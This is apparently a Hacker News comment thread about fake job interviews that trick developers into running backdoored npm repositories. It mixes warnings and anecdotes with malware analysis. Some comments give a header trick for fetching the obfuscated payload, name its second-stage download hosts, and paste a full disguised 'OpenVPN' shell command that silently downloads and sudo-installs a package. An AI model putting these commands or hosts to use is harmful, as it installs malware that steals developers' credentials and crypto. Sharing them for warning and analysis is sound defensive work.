Someone sends you a repo, says the install is broken, and asks you to take a look.
A lot of developers would run rpm install before thinking twice, especially if they were tired or looking for work.
The interview context makes it worse. You’re trying not to look slow, so you skip the part where you ask whether you should run it at all.
At least now there is a blog post that you can link to and say "Sorry, but I don't run npm install locally because of the risk of phishing attacks."
A skilled employee would never skip that step, why should you do so in an interview context? Skipping that step seems like a task failure to me just as much as any other part of the question from an interviewer perspective. Maybe I shouldn't hire the guy that blindly runs code just because someone "senior" to them asks.
They seem to using the same domain for multiple targets: reddit thread from 3 months ago:
https://www.reddit.com/r/openclaw/comments/1rlet0h/someone_t...
Been through this 3 times in the last 6 months. They're getting better. Very credible LI profiles, code looks OK if you only take a glance... The bell start ringing when they insist you to run locally their sh*t
Similar for me. One was for an overly very well paid position. I always run (p)npm audit before running npm repos, so lots of issues were found. I tried to fix them but I would have gone over the time limit. So I asked the recruiter about it and if it makes sense to run it in an isolated VM. No answer...
The other was for a DevEx crypto service. While I was very suspicious the code looked okay but the recruiter was strange and changed their profile to a different person eventually. I think this was a crypto stealing scam though since it required connecting to a wallet. I don't have any crypto though, so I might be okay for now. Although reinstalling my system clean would be the only sure way in theory...
The big red flag should be giving github access before signing any contracts.
They mostly use public repositories though.
Yeah, but that should also be a red flag.
this happened to me too. few things about the process made me suspicious. i downloaded the repo and told claude to "find the malware". took about 15 seconds. remote code execution that would have run upon npm install, iirc. many layers of obfuscation. in implementation, a little different to the op's situation but there are similarities. it was a "crypto startup". maybe they think people in crypto world are more forgiving of idiosyncrasies in the recruiting process? i reported the recruiter's profile to linkedin, with extensive details. they said they wouldn't look into it unless i opened a ticket in some other part of their site, lol. however it seems they got onto it, or someone else complained, because i can't find the recruiter "alice kenny" anymore. but the "company" she was recruiting for is still live:
https://www.linkedin.com/company/blockchainaustraliasolution...
They target people looking at crypto startups because they're after wallets and seed phrases
Hm, the url returns a png. Did he obscure the actual url? Couldn't get it to send me json or js...
Update: found a clone of the repo on github and got the payload, all you have to do is add a header `bearrtoken: logo`
It's obfuscated, I will feed it to qwen to see what can be gleaned.
Same here.
I tried content-types, user-agent, but no luck. I'm not sure what the user-agent of `req` is, but the default `node-fetch/1.0` does make the response json. They are a 307, but the result is a png.
I presume the original payload may have contained information that the hackers want to keep from prying eyes. Esp. now that it landed on HN, it makes sense to take it offline and replace with an actual png to avoid people finding information in it that may harm their future hacks or so?
Got it after adding the header: `bearrtoken: logo`.
Without seeing the request code I initially assumed it would be `Authorization: Bearer logo` that did the trick.
So fed it to qwen. It seems to think it just a downloader and persistence mechanism for another payload. I will try to download it too and see what qwen thinks of that.
thanks for following down the rabbit hole, let us know what you find! also... why qwen?
> why qwen
I have it running locally, and i don't want to add credentials to the vm with the malware.
According to qwen:
It's cross platform
It has a bunch of persistence mechanisms.
It downloads another pack from pub-1fe39d600a4447ba895ef1c848d32e7e.r2.dev, Verified I got the secondary payload
This pack looks like a python 3.10 environment along with an executable called cupsd.
And downloads another js script from http://138.201.125.58:1224/client/99/77
That script then proceeds to download three python scripts that use the aforementioned python environment and do their business, qwen is having trouble de-obfuscating their urls and I am busy.
Why is npm still not blocked by every OS on earth is beyond me. These guys will never learn.
Nothing to do with nom itself. This sort of scam would have worked with many different technologies, even a Makefile.
Cat related technology like noms and toe beans are immune to this exploit. =3
Because uh every OS on earth has the exact same vulnerabilities? How are you supposed to stop a user from downloading something random from the internet and running it?
Some posix like systems mount /home with noexec in fstab.
Practically, most systems leave it off because many out-of-band user space script language package ecosystems stop working. =3
There are also adaptive application firewalls that are user friendly.
https://github.com/evilsocket/opensnitch
noexec clearly isn't going to help if you run untrusted JavaScript...
Sometimes, but nodejs or npm won't work properly without the headless chromium VM, and would need bypassing local file-access security-sandbox restrictions most normal system Web-browsers enforce by default.
If root installs OS supported VM packages, than it would be pointless to complain the system runs as expected. As a sentient turnip, I probably wouldn't know for sure... =3
npm is hard to avoid, as other ecosystems have integrated it as a cross-platform build/installer script bootstrap.
Indeed, all things nodejs are usually a dumpster fire at a hair salon, but the real point here was people always inherit whatever the previous cheapest labor built at that office. Also, usually people don't get to make architectural decisions for a long time. =3
How does npm differ from any other package manager in that sense?
They typically don't execute arbitrary code when setting up the project.
If a build tool has any support for tests, it can execute arbitrary code, since that is what tests are. I am quite sure Maven's pom.xml can install binary jar into local .m2/repository, and later use it as plugin during generate-sources phase - and that is something an IDE will want to do when opening project. NPM attacks are really product of its popularity (and update churn that community already got used to).
fyi npm 12 will have securer defaults https://github.blog/changelog/2026-06-09-upcoming-breaking-c... but it will be a while for ecosystem to catch up and npm reputation already damaged
I've pretty much have had the same thing to me happen on Fiverr about 10 months ago.
I even did a write up. It was one of the first reverse engineerings I've did. https://gist.github.com/Throvn/97fcb4981c1ff66725d4b2e408ba0...
Maybe Mac will finally get decent virtualization framework. Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast.
Remember to use protection when meeting random people, and putting their junk deep inside your computer!
Or running random curl | bash scripts from GitHub, AUR, NPM are just as bad but many developers here still have dubious assumptions on this bad practice.
The last few weeks tell us how bad this is especially with all the mini-shai hulud's running around.
>Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast.
It's ok, the guy with glasses from the Daily Show said it's ok.
> Maybe Mac will finally get decent virtualization framework.
it already has, you can configure intellij to run npm commands in a Docker container.
Im not sure if anyone will read this, but I consider myself pretty savvy having been on the internet over decades however I nearly succumbed to a highly complex Linkedin "Interview with video call just to get me to install malware".
It was the most bizarely long roundabout way to get me to isntall malware I had ever witnessed I couldnt fathom it was real, I mean they interviewed me for half an hour. Now you might think Im paranoid however it was obvious, their camera was off ( personal preference they said) and well I allowed it... only for other eventual straws to breal the camels back, and I realised "oh uh oh this is just 2 strangers trying to get me to install crap on my laptop for wealth extraction".
I was flumoxed tbh I couldnt believe it, as the approach had been very organic, through Linkedin Dms, just that eventaully I realised I had succumbed to "yes men" ( the only thing that would get passed my already strict job filters ironically) to allow myself into such a comprimising situation.
The only question I had is how did they do such a smooth complex manouver and then I realised... oh they just used AI to come up with the plan and implementation.
Yeah, the camera off thing has happened to me too, and it should be a red flag to anyone if an interview situation.
This is a common one. I've had at least half a dozen of them. If I'm bored, I play along, and then play difficult and dumb and see how long it takes until they give up.
Some of these will happily get on "interview" calls etc.
For some reason, most (but not all) of them have the same telltale signs of looking for someone to work on a web3/crypto gaming project.
All they want is to get your keys and empty your wallet
I guess that might be a reason to use the web3/crypto angle to get people who are unlikely to have crypto wallets to self-select out...
I've been getting some job offers on LinkedIn, all of them are shady af. Apply using a platform. Apply recording a video of yourself. Apply by resolving a calibration code test (behind a code platform)...
My brother had been unemployed for a long time due to illness, and finally got a "job offer" on LinkedIn that seemed legit to him. They asked for him to write a check to make a deposit for his company laptop (which seems pretty insane on the face of it), but he was desperate and really happy to finally have a job offer.
People who've been unemployed for a long time are often desperate enough to overlook serious red flags that would never catch someone with substantial savings or who's employed and looking to job hop.
A long time ago, I worked for an ISP that sent out the famous "we'll never ask for your passwords" email. Then, about 3 weeks in, they sent out emails asking people for their passwords. If you told me that this was a happy ending, he sent in a check and they sent a laptop and after 2 paychecks released his deposit, I wouldn't be shocked. Some companies are run by idiots. I even know that most companies could probably cover scammed hardware with business insurance, but then I wonder how many flying-by-the-seat-of-their-pants outfits don't have the insurance.
Hoping he wasn't scammed.
My favorite was a job posting through a company called ladders
Saw it in the soup of other job posting, went to apply, it took me to some other job portal, ok whatever, this is normal, filled out all the forms as one does, and then reached the end and the site told me they'd submitted my application, and here were some other jobs I could apply to with the same application. Useful, right?
Click any of them, or anywhere else on the page, and a full screen modal takeover comes up, demanding you pay $50/application.
I closed the tab, but watched the email they sent me from the first job app. It went nowhere. Eventually applied to the company directly, on their job portal, and when I got to a real recruiter later, they said they never received my first app. My guess is ladders never even sent it and wouldn't until I paid up
Best part was ladders continued to spam my email inbox with job application invitations, each one wanting the same $50, until I blocked the fastmail throw away
I also had a "recruiter" reach out to me about a "role I'd be a good fit in". Made the meeting, and immediately some red flags. Audio and video were about 2 seconds out of sync. Guy then proceeded to try and pitch me on a similar job board, with the same $50/application cost, only this one had a 10 weeks salary cost on placement as well
I told him I wasn't interested.
Maybe these are just more traditional scams or whatever, not the malware type the op is about, but they still piss me off
Isn't this how most NPM authors are hacked these days? I think the axios guy got hit with the same approach over LinkedIn.
Hoisted by their own petard vibes.
I had a similar experience, just by email.
https://blog.denv.it/posts/i-was-likely-targeted-by-dprk-in-...
It was likely DPKR.
I work in crypto and this is happening practically every other day. I refuse anyone on LinkedIn that I don't know personally and has web3 or crypto anywhere in the description. It's all fake accounts with fake job offers. It's a pretty known scam.
Worth noting that, this isn't just a risk with npm or other package managers. If you're using LLM agents in the directory of a cloned repo, there's risks in skills, hooks etc automatically executing..
This is very likely Lazarus Group - specifically Famous Chollima aka the DPRK
I was a victim of this attack on Friday. The interviewer had a russian / east European accent.
"Recruiters" are getting sophisticated.
I spoke on the phone with "Singapore based recruiters" a couple of times who wanted my services as a consultant for "advanced applications for semiconductor devices."
Turns out they were just fishing for inside information on my employer's end customer's applications.
The US government should be involved in protecting the US fromthis kind of international crime and corporate espionage.
Just a thought, but no call to action from me.
I don't have a LinkedIn profile.
~50% of jobs listed on who is hiring every month require a LinkedIn profile to submit a job application.
In order to find a job, one must bend the knee to LinkedIn first and subjugate themselves to the political (all sides) propaganda on the feed.
I have a profile, but you couldn't pay me to look at the feed.
I use a Firefox extension to block the feed
Wait until the extension gets acquired by a third party and turns into malware
What part of applying to LinkedIn jobs require you looking at the feed?
I really want to know what would've happened with an npm install, I guess something boring like crypto mining or identity theft?
Arbitrary remote code execution, maybe sold to the highest bidder like some shady cloud provider?
You can actually test it yourself. The actual URL is in the post and the website is still up.
Seems like it actually loads a PNG image now, maybe the npm script adds some additional headers to trigger the payload.
AFAIK most malware like this first sends the contents of your environment variables, ssh keys, passwords, etc. to the server, and then sets up a persistent process that executes arbitrary commands received from the attacker's server at any time, allowing them to run whatever else they want
This has happened to me, it was an attack that was trying to get crypto private keys (ethereum)
Compromise of developer's access, API keys, etc. in order to create a supply chain attack.
I can not imagine a situation where some random person messages me on linkedin asking me to solve a coding challenge, and I do anything other than block them.
I'm guessing you've never experienced the enormous pressure of needing to find a job to buy food and clothes for your family. That's good, I'm glad that you don't know that feeling. But if you did, you'd know how easy it could be for a person to start feeling more and more desperate for any kind of lifeline.
There is still no chance that my first reaction to a random stranger asking me to do work for them is "sure", without building some sort of connection. Granted, that means I could still get phished via a coding exercise, but it would require a bit more effort on the attacker's part.
It’s odd that the operator of the scam knew full stack level details of its implementation. To me, it seems like they were targeting the author, perhaps as something like privilege escalation, identity escalation perhaps.
Martin from GitHub here - the offending repos have been taken down, but the article from Roman is still very much worth reading to understand the attack vector attempted.
I'm seeing the same. Worth flagging that maintainers seem to be a specific target now, not just job seekers. If you've got commit access to anything popular, backdoors like this become a lot more dangerous, because the supply-chain payoff is much bigger than your laptop
I used to get 2-3 shady crypto offers per week on LinkedIn. It stopped when I started replying with AI generated responses demanding multiple verification steps: official email, official offer link, terms and scope etc. And a note with a firm refusal to run any code or install any package on my machine for "recruitment tasks".
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Github is really slow when it comes to malicious repos. You'll probably get an email randomly six months from now when they finally see it.
It’s just so heartwarming to see we are completely indentured to both LinkedIn and GitHub, and forced to curate fake personas and upload our life's work just to secure a paycheck.
Yes, throwaway VPS for interview coding tasks should be the new norm.
> I’ve heard of these attacks and read about them on HN
And, I am reading this on HN right now. What a coincidence!
I read a lot about social engineering and how the human being is considered the weakest layer in the security chain but this is the first time I've came across this pattern. Eye opening indeed.
I only use LinkedIn for the job postings but they’ve become flooded with nonsense the past few months. Lots of postings from Ladders, Swooped, and various companies like those. I think I’m about to ditch LinkedIn permanently.
> recruiter at a small crypto startup
That's your first red flag right there.
Smells like contagious interview campaign by DPRK folks. They have been doing this for a while. Even using IDE settings, Claude hooks for malicious code execution.
I didn't read everything, but I had a DM offering a gig a few weeks ago, and asked me to check out a React site/app. I cloned it and it looked dubious; replied I pass.
I had a [similar](https://dev.shivagaire.com.np/linkedin-client-rce-backdoor-n...) encounter before. Jobs are scarce and this kind of targeted dev attacks semms to be more frequent these days.
Oh my goodness! I had this playout as is on Friday. I luckily got on the zoom call 20 mins late. Found it weird that the interviewer was pushy and wanted me to download and run an npm repo. I got out of the call quickly.
> Instead of cloning and installing dependencies, I spun up a throwaway VPS on Hetzner, cloned the repo there, and pointed Pi at it in read-only mode, with only file-reading tools enabled...
Good man, knows what he is doing.
FWIW, I only run ai cli tools on a hostinger vps, never on my personal device. Also allows me to run YOLO mode across the board. If I am working on a web project, then I use preview develop deploys for testing, so I do not even have to work on my machine. Its very fun workflow for experimentation. Still trying to work the kinks to make it easier.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Come on, github...
> but on a more tired or rushed day
This has nearly gotten me before, and I got lucky.
LinkedIn offers are mostly eiter scam or just for promotions
Were I still on Linkedin, I could totally have been caught by this. Thank you for this post, and the technical breakdown.
The company that I currently work for is currently paying for a curation product to scan NPM for vulnerabilities, and to prevent access to typo-squatting packages and new, unverified packages. I suspect that my employer may get to the point of banning NPM entirely, though.
> but on a more tired or rushed day, I could easily have run npm install before thinking it through
> So far nothing has changed and the code is still up.
That sucks, but it seems to be par for the course, these days.
How about running that backdoor from a honeypot and check what it is trying to do?
Seen similar: https://www.theregister.com/security/2026/04/23/dev-targeted...
I reported it and it seems like the repo no longer exists
This is the first time i have heard of this type of scam so horrible like people need to be careful on both github and linkedin
They’re quickly becoming the new sourceforge
I feel like there's only going to be more attempts like this, given the state of how many recently made redundant software engineers out there, and the level of desperation to find a job.
Western governments should treat large-scale scammers and the countries that protect them as an act of war.
I’ve seen a few of these – malicious repos to clone, fake call links that prompt for “driver” downloads, and so on.
The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.
Honestly, I would have given up before starting. You spend time and effort on these cases only for the company to say "Unfortunately..."
I've got more than a handful of these offers so I decided to never install anything and politely decline such offers.
Linkedin has become a rotten cesspool of scammers and spammers, ripe for disruption.
With how many desperate software engineers there are on the market right now looking for a job, there are going to be scumbags out there trying to take advantage of the desperation. Such people are the worst of the worst of humanity.
Stay vigilant out there everyone.
> Such people are the worst of the worst of humanity.
I don't know. There's a plentiful supply of bad humans.
Anyone who preys on people who are desperate and hurting are certainly some of the worst though.
It would have been game over for me.
Something similar happened to a friend, repo https://github.com/momonity/cryptoskope/
Would highly recommend running any repo in an isolated environment like a vm
I wonder if an antivirus software would catch this..
Damned, there is a market for an "antivirus for developers".
Ah, c'mon! You went all the way to find out the issue and write about it, and won't do the most interesting part which is to tell us what was the remote script that would end up running!?
So the backdoor isn’t in the offer but came per offer
> so just installing dependencies executes the backdoor.
How anybody in their right mind still uses this tech stack is beyond me.
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.
Remember to treat every size on the internet as an adversary, even if they weren't in the past.
I'm a simple man. I see crypto currency and I move away from what looks likely a social scam.
Sure, that might have been the one chance in a life time to easy big money. Or just a path to financial big troubles.
More reasons for me to dislike linked-in. I have an account. I hate it.
the entire internet is just phishing at this point
Thought: they may be targeting software developers on the assumption they may have legit credentials lying around from other employers or for public open source projects, or at a minimum some reputation to exploit towards obtaining commits to the same for supply chain attacks.
Or, you know... money
As part of a potential interview, I was given login credentials so I could sign in to a site where I was prompted to download a VPN client that would allow me to connect to the company's system (red flags already).
They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents was as follows (with the malicious URL removed):
```
( brew install openvpn ) >/dev/null 2>&1 & ovpn_pid=$!; ( url="https://asshole.scammer.dev/openvpn-mac"; policyCategoryId="-1"; installerArgs="url=$url:departmentId=1765561620401102848:sourceInstall=silent:technicianId=7455681275330027520"; silentInstall="true"; waitForProcess(){ processName="$1"; fixedDelay="$2"; terminate="$3"; while pgrep -f "$processName" >/dev/null; do if [ "$terminate" = "true" ]; then pkill -f "$processName" true; return; fi; delay="${fixedDelay:-$((RANDOM % 50 + 10))}"; sleep "$delay"; done; }; checkForRosetta2(){ waitForProcess "/usr/sbin/softwareupdate"; IFS='.' read -r osvers_major osvers_minor <<< "$(/usr/bin/sw_vers -productVersion)"; if [ "$osvers_major" -ge 11 ]; then if ! sysctl -n machdep.cpu.brand_string | grep -q "Intel"; then pgrep oahd >/dev/null 2>&1 /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1; fi; fi; }; checkForRosetta2; DIRECTORY="/Users/Shared/InstallerWorkspace"; mkdir -p "$DIRECTORY"; configFile="$DIRECTORY/agentinstallconfig.properties"; { echo "policyId=$policyCategoryId"; echo "install_args=$installerArgs"; echo "Silent_Install=$silentInstall"; } > "$configFile"; baseName="$(basename "$url")"; downLoadFile="/Users/Shared/$baseName"; curl --silent --fail --location --url "$url" --output "$downLoadFile" >/dev/null 2>&1 && sudo installer -pkg "$downLoadFile" -target / >/dev/null 2>&1; t=$?; rm -f "$configFile" "$downLoadFile"; exit "$t" ) >/dev/null 2>&1 & so_pid=$!; wait "$ovpn_pid"; ovpn_rc=$?; wait "$so_pid"; so_rc=$?; [ "$ovpn_rc" -eq 0 ] && [ "$so_rc" -eq 0 ]
```
Yeah, no. Be careful out there.
By the way, here's the scammer's "company website": https://jtwllc.com/
Superficially looks legit until you start investigating the finer details.
I'm working 3 remote jobs right now and I can tell you guys to really watch out.
Often they are not malicious, just unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take home screening project and they are quite good at getting at engineers heads that "leetcode is outdated/they dont believe in it" and whatever they want you to hear.
They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it.
I am much wiser now that I work multiple salary jobs remotely I realize these 3 golden rules:
- Don't stay loyal to your employers.
- Don't stay honest to those don't value it.
- Don't stay complacent always innovate.
> Don't stay honest to those don't value it.
IMO you are either honest or you are not
If you are honest with people who don't want to hear the truth, you are going to be dishonest with people when they want the truth.
That doesn't follow.
you'll figure it out
LinkedIn is a cesspool of scams now.
They know there's a high degree of fraud and they don't do anything about it. They don't care.
I've gotten tricked into sending my resume and talking on the phone with legitimate looking recruiters from Google, Netflix, Meta, OpenAI, Anthropic, etc, but LinkedIn does nothing about it.
It's become Facebook, too. I constantly see posts about the MAGA issue of the day.
Once again I'll state my opinion, don't use linkedin. It's a social media site not an employment/recruitment resource.
Yet another reason to be reluctant to even discuss linkedin job offers
now imagine if you were like the rest of us and didn’t write a blog post about it